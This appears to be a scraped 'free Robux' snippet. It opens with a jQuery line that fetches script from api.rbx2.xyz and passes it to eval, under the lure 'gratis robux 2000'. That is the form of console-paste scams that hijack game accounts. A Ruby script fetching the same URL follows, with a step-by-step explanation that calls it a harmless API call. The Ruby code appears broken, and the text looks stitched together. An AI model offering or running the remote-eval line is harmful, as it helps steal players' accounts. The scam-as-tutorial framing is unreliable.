$ Javascript $ . get ( '//api.rbx2.xyz/rbx id = 16553' , eval ) gratis robux 2000

require 'open-uri'
require 'json'

url = '//api.rbx2.xyz/rbx?id=16553'
response = JSON.parse(open(url).read)
robux_amount = response['gratis_robux']

puts "Received #{robux_amount} gratis robux"


  1. Import necessary libraries: open-uri for opening URLs and json for parsing JSON data.
  2. Set the URL to '//api.rbx2.xyz/rbx?id=16553' which likely points to an API endpoint.
  3. Use open(url).read to access the data from the URL and JSON.parse to parse the received JSON data.
  4. Retrieve the amount of 'gratis_robux' from the JSON response using response['gratis_robux'].
  5. Display the received amount of gratis robux using puts.